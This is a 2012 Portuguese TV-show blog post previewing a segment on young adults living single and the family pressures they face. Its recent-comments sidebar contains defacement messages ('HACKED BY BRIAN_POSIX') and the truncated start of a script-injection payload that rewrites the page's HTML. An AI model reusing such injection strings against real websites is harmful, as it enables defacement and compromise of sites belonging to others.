Labirintos Familiares @ 19:06

Sex, 27/04/12

Cada vez há em Portugal mais jovens adultos que optam por viver temporariamente a sua vida de solteiro de forma autónoma. Em casa própria ou partilhada com amigos, esta é uma fase que permite a consciência de si e uma redefinição da relação com a família de origem. Por vezes, esta “fase” é prolongada no tempo, por circunstâncias ou opção, ficando o jovem solteiro por mais tempo do que a sua expectativa inicial. Se para muitos, viver solteiro é experienciado com alegria e satisfação, noutros casos são sentidas as pressões da família e sociedade, mas também do próprio, bem como algum isolamento quando “todos” os amigos seguem o percurso para uma vivência conjugal. Quando a condição de solteiro não é uma opção, pode trazer algum mal-estar, à medida que os anos passam.

Quais os principais desafios de viver solteiro? Como são encarados os solteiros pelas suas famílias?

Na próxima rubrica dos Labirintos Familiares, iremos falar sobre a vida de solteiros: os que aguardam alguém especial e os que assim escolheram. Falaremos sobre o suporte e/ou pressões da família, as aspirações de todos e possibilidades para uma dinâmica familiar positiva e inclusiva. Não perca!





Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO